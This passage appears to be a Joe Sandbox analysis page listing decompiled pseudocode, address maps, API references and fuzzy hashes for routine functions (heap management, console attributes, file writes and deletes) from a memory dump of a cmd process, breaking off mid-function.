Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: QueryValue$ErrorLastOpen
String ID:
API String ID: 4270309053-0
Opcode ID: 9928b86e8186f6636fc62945faadcb9d26569cbb55e68b6837ef2b2e36947344
Instruction ID: dd46f2ea022506b31de3d7a076c6cf3b6848bd65a8f401d295e7d93eb431711a
Opcode Fuzzy Hash: 9928b86e8186f6636fc62945faadcb9d26569cbb55e68b6837ef2b2e36947344
Instruction Fuzzy Hash: FA2150B1D00629EFDB109FA98C80AFEB6BEFB58740B50412AF501F2290D7708D40DB60

Uniqueness

Uniqueness Score: -1.00%

Function 001B56AE Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001B56AE(void* __ecx, intOrPtr __edx, FILETIME* _a4, intOrPtr _a8) {
				struct _OVERLAPPED _v12;
				short _t11;
				void* _t14;
				void* _t17;
				void* _t27;
				FILETIME* _t30;

				_push(__ecx);
				_push(__ecx);
				_t27 = __ecx;
				_t19 =  *((intOrPtr*)(__edx + 0x20));
				_t11 = 0x1a;
				_v12.InternalHigh = _t11;
				if( *((intOrPtr*)(__edx + 0x20)) == 0) {
					_t19 = __edx;
				}
				_t30 = _a4;
				if(_t30 != 0xffffffff) {
					if(E001D84D3(_t19) != 0) {
						_t12 = E001C0178(_t12);
						if(_t12 == 0) {
							_t17 =  &(_v12.InternalHigh);
							__imp___get_osfhandle(_t12);
							_t12 = WriteFile(_t17, _t30, _t17, 1,  &_v12);
						}
					}
					if(_t27 != 0 && ( *(_t27 + 0x1c) & 0x00000080) == 0 && E001C0178(_t12) == 0) {
						_t14 =  *0x1dd55c; // 0x0
						if(_t14 != 3 && _a8 != 0 && _t14 != 2) {
							__imp___get_osfhandle(_a8);
							SetFileTime(_t14, _t30, 0, 0);
						}
					}
					_t11 = E001BDB92(_t30);
				}
				 *0x1dd56c =  *0x1dd56c + 1;
				return _t11;
			}

0x001b56b3
0x001b56b4
0x001b56b9
0x001b56bb
0x001b56be
0x001b56bf
0x001b56c5
0x001b56e1
0x001b56e1
0x001b56c7
0x001b56cd
0x001c9666
0x001c966a
0x001c9671
0x001c967a
0x001c967f
0x001c9687
0x001c9687
0x001c9671
0x001c968f
0x001c96a2
0x001c96aa
0x001c96bf
0x001c96c7
0x001c96c7
0x001c96aa
0x001c96cf
0x001c96cf
0x001b56d3
0x001b56de

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8b1dd8bb7f77f843550bb734fd8873f119676339216dcc59c689b8015c4e647
Instruction ID: ae0949f95495ebff269e339e13fa7e53f71d55c4e91638777bbe817ddb416309
Opcode Fuzzy Hash: d8b1dd8bb7f77f843550bb734fd8873f119676339216dcc59c689b8015c4e647
Instruction Fuzzy Hash: A611E231601A64ABDB196B25EC1DFBE7769EB64320F14410DF811C71E0DB30DD40CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 001DB91D Relevance: 6.1, APIs: 4, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001DB91D(void* __ecx) {
				signed int _v8;
				int _v20;
				char _v24;
				signed int _v28;
				void _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t30;
				WCHAR* _t31;
				int _t32;
				char _t34;
				void* _t40;
				void* _t42;
				signed int _t43;

				_t18 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t18 ^ _t43;
				_v28 = _v28 & 0x00000000;
				_t34 = 1;
				_v20 = 0x104;
				_t42 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E001C0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t30 = _v28;
					if(_t30 == 0) {
						_t30 =  &_v548;
					}
					__imp__GetVolumePathNameW(_t42, _t30, _v20);
					if(_t30 == 0) {
						L8:
						_t34 = 0;
					} else {
						_t31 = _v28;
						if(_t31 == 0) {
							_t31 =  &_v548;
						}
						_t32 = GetDriveTypeW(_t31);
						if(_t32 == 0 || _t32 == 4) {
							goto L8;
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E001C6FD0(_t34, _t34, _v8 ^ _t43, _t40, 0x104, _t42, _v28);
			}

0x001db928
0x001db92f
0x001db932
0x001db949
0x001db94a
0x001db94e
0x001db950
0x001db953
0x001db979
0x001db97b
0x001db980
0x001db982
0x001db982
0x001db98d
0x001db995
0x001db9b4
0x001db9b4
0x001db997
0x001db997
0x001db99c
0x001db99e
0x001db99e
0x001db9a5
0x001db9ad
0x00000000
0x00000000
0x001db9ad
0x001db995
0x001db9b9
0x001db9d2

APIs

memset.MSVCRT ref: 001DB953

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 001DB98D
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001DB9A5
??_V@YAXPAX@Z.MSVCRT ref: 001DB9B9

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$DriveNamePathTypeVolume
String ID:
API String ID: 1029679093-0
Opcode ID: 877d3dbc41579a610bbd64c0f9ba3e8cd1f1ead3891a412a0e589faa1aded651
Instruction ID: 95035d0cbdefcdc6c98abeaaed87db32625fd304184c3c32af13006176633f80
Opcode Fuzzy Hash: 877d3dbc41579a610bbd64c0f9ba3e8cd1f1ead3891a412a0e589faa1aded651
Instruction Fuzzy Hash: 83118171A04159ABDB10DBA9ECC9FBFBBB8EB54308F04006EA605D3240DB34DE44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001D916C Relevance: 6.1, APIs: 4, Instructions: 66
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E001D916C(void* __ecx, long __edx, DWORD* _a4, WCHAR* _a8, intOrPtr _a12) {
				char _v8;
				void* _t6;
				int _t7;
				void* _t14;
				DWORD* _t15;
				void* _t27;
				void* _t28;
				void* _t30;
				intOrPtr _t31;
				void* _t35;

				_t15 = _a4;
				_t6 =  &_v8;
				_t31 = 0;
				_t28 = __ecx;
				__imp___get_osfhandle(0, _t27, _t30, _t14, __ecx, __ecx);
				_t7 = WriteFile(_t6, __ecx, __edx, _t15, _t6);
				if(_t7 == 0 || _t15 != _v8) {
					L3:
					 *0x1f3cf0 = GetLastError();
					E001BDB92(_a12);
					if(E001C0178(E001BDB92(_t28)) == 0) {
						DeleteFileW(_a8);
					} else {
						_t31 = 0x1d;
					}
					 *0x1dd5cc =  *0x1dd5cc & 0x00000000;
					_t22 =  *0x1f3cf0;
					if( *0x1f3cf0 == 0) {
						_t22 = 0x70;
						 *0x1f3cf0 = _t22;
					}
					if( *0x1dd544 == 0) {
						if(_t31 == 0) {
							E001D985A(_t22);
						}
					} else {
						_t31 = 0;
					}
					_t7 = E001D85E9(_t31, 1);
					goto L13;
				} else {
					_t35 =  *0x1dd544 - _t31; // 0x0
					if(_t35 == 0) {
						L13:
						return _t7;
					}
					goto L3;
				}
			}

0x001d9174
0x001d9177
0x001d917c
0x001d917e
0x001d9185
0x001d918d
0x001d9195
0x001d91a4
0x001d91ad
0x001d91b2
0x001d91c7
0x001d91d1
0x001d91c9
0x001d91cb
0x001d91cb
0x001d91d7
0x001d91de
0x001d91e6
0x001d91ea
0x001d91eb
0x001d91eb
0x001d91f8
0x001d9200
0x001d9202
0x001d9202
0x001d91fa
0x001d91fa
0x001d91fa
0x001d920c
0x00000000
0x001d919c
0x001d919c
0x001d91a2
0x001d9211
0x001d9217
0x001d9217
0x00000000
0x001d91a2

APIs

_get_osfhandle.MSVCRT ref: 001D9185
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001D8CA9,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 001D918D
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 001D91A4
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 001D91D1

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: File$DeleteErrorLastWrite_get_osfhandle
String ID:
API String ID: 2448200120-0
Opcode ID: a0aa44483bbff23a4b3bef4d46b7f9801740eae729389f42e3279193d421a348
Instruction ID: 8db1d0ccda97f40d96f4d5956d00dacf6aa1f32b55c2e987dc589133c37337d2
Opcode Fuzzy Hash: a0aa44483bbff23a4b3bef4d46b7f9801740eae729389f42e3279193d421a348
Instruction Fuzzy Hash: B611E331601225ABDB29AF65FC89B7E776DFB85721F00411BF80483290DF709C81CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C5D59 Relevance: 6.1, APIs: 4, Instructions: 60
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001C5D59(void* __ebx) {
				intOrPtr _t4;
				void* _t15;
				intOrPtr* _t16;
				void* _t23;
				void* _t27;
				intOrPtr* _t28;
				void* _t29;

				_t15 = __ebx;
				_t28 =  *0x1f3cb8;
				_t16 = _t28;
				if(_t28 == 0) {
					_t16 = 0x1f3ab0;
				}
				_t23 = _t16 + 2;
				do {
					_t4 =  *_t16;
					_t16 = _t16 + 2;
				} while (_t4 != 0);
				_t27 = (_t16 - _t23 >> 1) + 1;
				if(_t28 == 0) {
					_t28 = 0x1f3ab0;
				}
				E001C36CB(_t15, _t28,  *0x1f3cc0, 0);
				_t29 = HeapAlloc(GetProcessHeap(), 0, _t27 + _t27);
				if(_t29 == 0) {
					L11:
					return 0;
				} else {
					_t20 =  *0x1f3cb8;
					if( *0x1f3cb8 == 0) {
						_t20 = 0x1f3ab0;
					}
					E001C1040(_t29, _t27, _t20);
					if(E001C5DEA(_t29) == 0) {
						RtlFreeHeap(GetProcessHeap(), 0, _t29);
						goto L11;
					} else {
						return 1;
					}
				}
			}

0x001c5d59
0x001c5d5c
0x001c5d62
0x001c5d67
0x001cf361
0x001cf361
0x001c5d6d
0x001c5d72
0x001c5d72
0x001c5d75
0x001c5d78
0x001c5d81
0x001c5d86
0x001c5dd8
0x001c5dd8
0x001c5d92
0x001c5daa
0x001c5dae
0x001c5de6
0x00000000
0x001c5db0
0x001c5db0
0x001c5db8
0x001c5ddf
0x001c5ddf
0x001c5dbf
0x001c5dcd
0x001cf375
0x00000000
0x001c5dd3
0x00000000
0x001c5dd3
0x001c5dcd

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 001C5D9D
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001C5DA4

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: ead02dc487e9caf1c59c630f9749020e34ddba2e8736048b2d85521c3db5f34d
Instruction ID: 2e052bb7c963db485920a45607a1b6e089bfaa83bf6164530417a32fabccd684
Opcode Fuzzy Hash: ead02dc487e9caf1c59c630f9749020e34ddba2e8736048b2d85521c3db5f34d
Instruction Fuzzy Hash: 44110831608B2167C71C6B65581CF7F2357EFA5B10B1A019DE907AB644CB60EDC2D6A1

Uniqueness

Uniqueness Score: -1.00%

Function 001C0100 Relevance: 6.1, APIs: 4, Instructions: 56
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E001C0100(void* __ecx, void* __edx) {
				void* _t12;
				long _t15;
				void* _t16;
				void** _t17;
				void* _t19;
				void* _t20;

				_t16 = __ecx;
				_t15 = __edx + 8;
				_t20 = __ecx - 8;
				if(_t15 < __edx) {
					L12:
					_push(0);
					_push(8);
					E001BC5A2(_t16);
					return 0;
				}
				_t19 = HeapReAlloc(GetProcessHeap(), 0, _t20, _t15);
				if(_t19 == 0) {
					goto L12;
				}
				 *_t19 = _t15;
				HeapSize(GetProcessHeap(), 0, _t19);
				if(_t19 == _t20) {
					L3:
					_t3 = _t19 + 8; // 0x8
					return _t3;
				}
				_t12 =  *0x1f3cdc;
				if(_t12 != _t20) {
					if(_t12 == 0) {
						goto L3;
					} else {
						goto L8;
					}
					while(1) {
						L8:
						_t17 = _t12 + 4;
						_t12 =  *_t17;
						if(_t12 == _t20) {
							break;
						}
						if(_t12 != 0) {
							continue;
						}
						goto L3;
					}
					 *_t17 = _t19;
					goto L3;
				}
				 *0x1f3cdc = _t19;
				_t4 = _t19 + 8; // 0x8
				return _t4;
			}

0x001c0100
0x001c0104
0x001c0107
0x001c010d
0x001cc9ea
0x001cc9ea
0x001cc9ec
0x001cc9ee
0x00000000
0x001cc9f6
0x001c0124
0x001c0128
0x00000000
0x00000000
0x001c0131
0x001c013a
0x001c0142
0x001c0144
0x001c0144
0x00000000
0x001c0144
0x001c014b
0x001c0152
0x001c0163
0x00000000
0x00000000
0x00000000
0x00000000
0x001c0165
0x001c0165
0x001c0165
0x001c0168
0x001c016c
0x00000000
0x00000000
0x001c0170
0x00000000
0x00000000
0x00000000
0x001c0172
0x001c0174
0x00000000
0x001c0174
0x001c0154
0x001c015a
0x001c0160

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000800,00000800,-00000004,-00000004,?,001BEBC3), ref: 001C0117
HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001C011E
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 001C0133
HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001C013A

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocSize
String ID:
API String ID: 2549470565-0
Opcode ID: acf02e425f1978db1593bbd7936d232a08ffba6bdb29b08ce1c2ed22b48af449
Instruction ID: 7eae3e17301ff04824438734a466c0a4e6e8855cb41c1525c0a444092cb1aabd
Opcode Fuzzy Hash: acf02e425f1978db1593bbd7936d232a08ffba6bdb29b08ce1c2ed22b48af449
Instruction Fuzzy Hash: 6901B976300202DBC7129B55DC88FA6F768EBA8765F294069F50AC6150DB31DD84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001D7DF1 Relevance: 6.1, APIs: 4, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E001D7DF1(unsigned int __ecx, void* __esi) {
				signed int _v8;
				signed short _v30;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				struct _COORD _v36;
				long _v40;
				void* __ebx;
				signed int _t11;
				void* _t20;
				int _t28;
				void* _t34;
				void* _t35;
				void* _t37;
				signed int _t38;

				_t36 = __esi;
				_t11 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t11 ^ _t38;
				_t28 = __ecx;
				if(((__ecx >> 0x00000004 ^ __ecx) & 0x0000000f) != 0) {
					_push(__esi);
					_t37 = GetStdHandle(0xfffffff5);
					if(GetConsoleScreenBufferInfo(_t37,  &_v32) == 0) {
						_t20 = 1;
					} else {
						_v36 = 0;
						FillConsoleOutputAttribute(_t37, _t28, _v32.dwSize * _v30, _v36,  &_v40);
						SetConsoleTextAttribute(_t37, _t28);
						_t20 = 0;
					}
					_pop(_t36);
				} else {
					_t20 = 1;
				}
				return E001C6FD0(_t20, _t28, _v8 ^ _t38, _t34, _t35, _t36);
			}

0x001d7df1
0x001d7df9
0x001d7e00
0x001d7e04
0x001d7e0f
0x001d7e16
0x001d7e1f
0x001d7e2e
0x001d7e5e
0x001d7e30
0x001d7e36
0x001d7e4a
0x001d7e52
0x001d7e58
0x001d7e58
0x001d7e5f
0x001d7e11
0x001d7e13
0x001d7e13
0x001d7e6e

APIs

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,001CE18E), ref: 001D7E19
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,001CE18E), ref: 001D7E26
FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,001CE18E), ref: 001D7E4A
SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,001CE18E), ref: 001D7E52

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
String ID:
API String ID: 1033415088-0
Opcode ID: 6c58a0423b9f4a99bb055e2f226c344020f7b12713c898813bb34f52910b44dd
Instruction ID: e8681fcf64a60e20487f44f1035b44d8541a69d75129991aa3156b42f661b44f
Opcode Fuzzy Hash: 6c58a0423b9f4a99bb055e2f226c344020f7b12713c898813bb34f52910b44dd
Instruction Fuzzy Hash: AF01B132A05119AF8B04AFB4AC84EFFB7FCEF0D311B00016AF816D6280EB249D41C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 001C6D00 Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001C6D00() {
				signed int _t10;
				intOrPtr* _t13;
				intOrPtr* _t14;
				void* _t15;
				signed int _t18;
				intOrPtr _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t25;

				_t25 =  *0x1b0000 - 0x5a4d; // 0x5a4d
				if(_t25 == 0) {
					_t19 =  *0x1b003c; // 0xf8
					__eflags =  *((intOrPtr*)(_t19 + 0x1b0000)) - 0x4550;
					if( *((intOrPtr*)(_t19 + 0x1b0000)) != 0x4550) {
						goto L1;
					} else {
						_t2 = _t19 + 0x1b0018; // 0xc0e010b
						_t18 =  *_t2 & 0x0000ffff;
						__eflags = _t18 - 0x10b;
						if(_t18 == 0x10b) {
							_t10 = 0;
							__eflags =  *((intOrPtr*)(_t19 + 0x1b0074)) - 0xe;
							if( *((intOrPtr*)(_t19 + 0x1b0074)) > 0xe) {
								__eflags =  *(_t19 + 0x1b00e8);
								goto L9;
							}
						} else {
							__eflags = _t18 - 0x20b;
							if(_t18 != 0x20b) {
								goto L1;
							} else {
								_t10 = 0;
								__eflags =  *((intOrPtr*)(_t19 + 0x1b0084)) - 0xe;
								if( *((intOrPtr*)(_t19 + 0x1b0084)) > 0xe) {
									__eflags =  *(_t19 + 0x1b00f8);
									L9:
									_t8 = __eflags != 0;
									__eflags = _t8;
									_t10 = _t10 & 0xffffff00 | _t8;
								}
							}
						}
					}
				} else {
					L1:
					_t10 = 0;
				}
				 *0x1dd1b0 = _t10;
				__set_app_type(E001C738E(1));
				 *0x1dd518 =  *0x1dd518 | 0xffffffff;
				 *0x1dd51c =  *0x1dd51c | 0xffffffff;
				_t13 = __p__fmode();
				_t22 =  *0x1dd4e0; // 0x0
				 *_t13 = _t22;
				_t14 = __p__commode();
				_t23 =  *0x1dd4d4; // 0x0
				 *_t14 = _t23;
				_t15 = E001C75B0();
				if( *0x1dd0b0 == 0) {
					__setusermatherr(E001C75B0);
				}
				E001C75B3(_t15);
				return 0;
			}

0x001c6d05
0x001c6d0c
0x001c6d12
0x001c6d18
0x001c6d22
0x00000000
0x001c6d24
0x001c6d24
0x001c6d24
0x001c6d2b
0x001c6d30
0x001c6d4c
0x001c6d4e
0x001c6d55
0x001c6d57
0x00000000
0x001c6d57
0x001c6d32
0x001c6d32
0x001c6d37
0x00000000
0x001c6d39
0x001c6d39
0x001c6d3b
0x001c6d42
0x001c6d44
0x001c6d5d
0x001c6d5d
0x001c6d5d
0x001c6d5d
0x001c6d5d
0x001c6d42
0x001c6d37
0x001c6d30
0x001c6d0e
0x001c6d0e
0x001c6d0e
0x001c6d0e
0x001c6d62
0x001c6d6d
0x001c6d73
0x001c6d7a
0x001c6d83
0x001c6d89
0x001c6d8f
0x001c6d91
0x001c6d97
0x001c6d9d
0x001c6d9f
0x001c6dab
0x001c6db2
0x001c6db8
0x001c6db9
0x001c6dc0

APIs

__set_app_type.MSVCRT ref: 001C6D6D
__p__fmode.MSVCRT ref: 001C6D83
__p__commode.MSVCRT ref: 001C6D91
__setusermatherr.MSVCRT ref: 001C6DB2

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1063105408-0
Opcode ID: ab3e26638faca199904e2bd2091e5beaaa29568380299a0bba8ca21f2c0e3e0f
Instruction ID: 558138a26561ca3cade8dc07d94e4288db79cd2025271ccec4e1c5b4d7f0d167
Opcode Fuzzy Hash: ab3e26638faca199904e2bd2091e5beaaa29568380299a0bba8ca21f2c0e3e0f
Instruction Fuzzy Hash: BF112A70A19304CAC725AB70E948B3537A1F769355F204A6EE0568A9E1E776C9C2DF10

Uniqueness

Uniqueness Score: -1.00%

Function 001B43A0 Relevance: 6.0, APIs: 4, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E001B43A0(void* __ecx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES _v16;
				void* _t6;
				long _t7;
				void* _t10;
				void* _t15;
				void* _t17;

				_v16.bInheritHandle = 1;
				_v16.lpSecurityDescriptor = 0;
				_v16.nLength = 0xc;
				_t6 = CreateFileW(E001C22C0(_t10, __ecx), 0x40000000, 0,  &_v16, 4, 0x8000080, 0);
				_t15 = _t6;
				if(_t15 == 0xffffffff) {
					_t7 = GetLastError();
					 *0x1f3cf0 = _t7;
					if(_t7 == 0x6e) {
						 *0x1f3cf0 = 2;
					}
					_t17 = 0xffffffff;
				} else {
					__imp___open_osfhandle(_t15, 8);
					_t17 = _t6;
					if(_t17 == 0xffffffff) {
						CloseHandle(_t15);
					}
				}
				return _t17;
			}

0x001b43ab
0x001b43b3
0x001b43b6
0x001b43d5
0x001b43db
0x001b43e0
0x001c838d
0x001c8393
0x001c839b
0x001c839d
0x001c839d
0x001c83a7
0x001b43e6
0x001b43e9
0x001b43ef
0x001b43f6
0x001b4401
0x001b4401
0x001b43f6
0x001b43ff

APIs

Part of subcall function 001C22C0: wcschr.MSVCRT ref: 001C22CC

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000), ref: 001B43D5
_open_osfhandle.MSVCRT ref: 001B43E9
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 001B4401
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001C838D

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
String ID:
API String ID: 22757656-0
Opcode ID: 19801adaf31df74c5ec51d45123c2ebcaf1d6b0786f4a894f45ed6b8fd422ca1
Instruction ID: e5814af0002bcc6bd5b493f4400b1af8b3f0561c642a132c14db50a6c958bf23
Opcode Fuzzy Hash: 19801adaf31df74c5ec51d45123c2ebcaf1d6b0786f4a894f45ed6b8fd422ca1
Instruction Fuzzy Hash: D701A771900120ABD7147BB8AC4DFADBBA8BB85735F11431AF975A31E0DF704845C690

Uniqueness

Uniqueness Score: -1.00%

Function 001D1914 Relevance: 6.0, APIs: 4, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001D1914(void* __ecx) {
				void* _t20;
				void* _t22;
				void* _t23;
				void** _t25;

				_t23 = __ecx;
				_t22 =  *(__ecx + 0x10);
				_t20 = _t22 + ( *(__ecx + 0x14) & 0x0000ffff) * 0x34;
				if(_t22 != _t20) {
					_t25 = _t22 + 0x2c;
					do {
						RtlFreeHeap(GetProcessHeap(), 0,  *_t25);
						 *_t25 =  *_t25 & 0x00000000;
						_t25 =  &(_t25[0xd]);
						 *(_t25 - 0x30) =  *(_t25 - 0x30) & 0x00000000;
					} while (_t25 - 0x2c != _t20);
					_t22 =  *(_t23 + 0x10);
				}
				RtlFreeHeap(GetProcessHeap(), 0, _t22);
				 *(_t23 + 0x10) =  *(_t23 + 0x10) & 0;
				 *((intOrPtr*)(_t23 + 0x14)) = 0;
				return 0;
			}

0x001d1918
0x001d191e
0x001d1924
0x001d1928
0x001d192b
0x001d192e
0x001d1939
0x001d193f
0x001d1942
0x001d1945
0x001d194c
0x001d1950
0x001d1953
0x001d195e
0x001d1966
0x001d1969
0x001d196e

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,001D1735), ref: 001D1932
RtlFreeHeap.NTDLL(00000000,?,?), ref: 001D1939
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,001D1735), ref: 001D1957
RtlFreeHeap.NTDLL(00000000), ref: 001D195E

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 955ea8b3bdb82f61dfd99f8b3f88519b8f1ab63030b4dd58071130521f430b51
Instruction ID: 744e902d26ce77de7d452cd265849755a8e903cb80eb62c841d8007b2baf5efb
Opcode Fuzzy Hash: 955ea8b3bdb82f61dfd99f8b3f88519b8f1ab63030b4dd58071130521f430b51
Instruction Fuzzy Hash: 48F062B2614202AFD7189FA0EC88BA5B7F8FF48326F10092EE541C6940D774F895CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C3B2C Relevance: 6.0, APIs: 4, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E001C3B2C(void* __ecx) {
				void _t4;
				void* _t9;
				void* _t12;

				_t9 = __ecx;
				_t12 = HeapAlloc(GetProcessHeap(), 8, 4);
				if(_t12 == 0) {
					L4:
					return 0;
				} else {
					_t4 = E001C3AAE();
					 *_t12 = _t4;
					if(_t4 == 0) {
						RtlFreeHeap(GetProcessHeap(), 0, _t12);
						_push(0);
						_push(0x233a);
						E001BC5A2(_t9);
						goto L4;
					} else {
